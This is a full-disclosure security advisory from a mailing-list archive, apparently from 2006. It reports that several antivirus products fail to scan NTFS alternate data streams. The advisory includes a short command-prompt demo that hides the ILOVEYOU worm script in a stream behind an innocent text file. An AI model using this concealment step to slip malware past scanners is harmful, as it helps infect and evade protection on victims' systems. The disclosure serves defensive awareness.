<<< Date Index >>>     <<< Thread Index >>>

Multiple Vendor NTFS Data Stream Malware Stealth Technique



Hi to all!

        Because it isn't a new problem and is well known by virus and spyware
writters I decide to release to the public now. Full disclosure.

        Attached goes a simple paper that describes this "very-advanced"
technique that was applicable at 1993 and is currently applicable.

Regards,
Joxean Koret


Disclaimer
----------

The information in this advisory and any of its 
demonstrations is provided "as is" without any
warranty of any kind.

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory. 

---------------------------------------------------------------------------

Contact
-------

        Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es

Multiple Vendor NTFS Data Stream Malware Stealth Technique
----------------------------------------------------------

Affected product/vendors:
        
        Panda Software. All products.
        ClamWin. All versions.
        Norman Virus Control. All versions.
        AVG Antivirus.

Non-affected vendors:
        
        Mcaffe / Computer Associates
        Avira Antivir PersonalEdition Classic

Technique Description
----------------------

        It isn't in any way a new technique, the first proof of concept of 
hidding malware into an NTFS 
data stream was published at 2000. Apparently the technique wasn't so popular 
and due to this fact 
the 75% (or more) of the anti-virus industry have been ignore it.

        The technique is as simple as follow. Download a virus file, even an 
old one. Call it, in example,
'iloveyou.vbs'. Next, go to a command prompt:

------------------------------------------------------------------------------------------------------
C:\>echo I'm an inocent file. > file.txt

C:\>type file.txt
I'm an inocent file.

C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 8475-DDEF

 Directory of C:\

06/03/2006  01:10       <DIR>          Documents and Settings
03/06/2006  05:10                   23 file.txt
03/06/2006  04:52               10.320 iloveyou.txt
03/06/2006  04:52               10.320 iloveyou.vbs
26/12/2005  00:51       <DIR>          Inetpub
03/06/2006  05:09       <DIR>          Program Files
29/05/2006  23:24                   12 test1.vbs
03/06/2006  05:06       <DIR>          WINNT
               4 File(s)         20.675 bytes
               4 Dir(s)   2.539.368.448 bytes free

C:\>type iloveyou.vbs > file.txt:virus.vbs

C:\>type file.txt
I'm an inocent file.

C:\>more < file.txt:virus.vbs
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@xxxxxxxx / @GRAMMERSoft Group /
(...)
---More---
------------------------------------------------------------------------------------------------------


        Now, try scanning your system with your preferred vulnerable antivirus 
product. The first file in a
normal data stream 'iloveyou.vbs' will (surely) be detected but not the copy of 
it stored in an alternate
data stream of the apparently innocent file c:\file.txt.


Disclaimer
----------

The information in this advisory and any of its 
demonstrations is provided "as is" without any
warranty of any kind.

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory. 

---------------------------------------------------------------------------

Contact
-------

        Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es

Attachment: signature.asc
Description: Esta parte del mensaje =?ISO-8859-1?Q?est=E1?= firmada digitalmente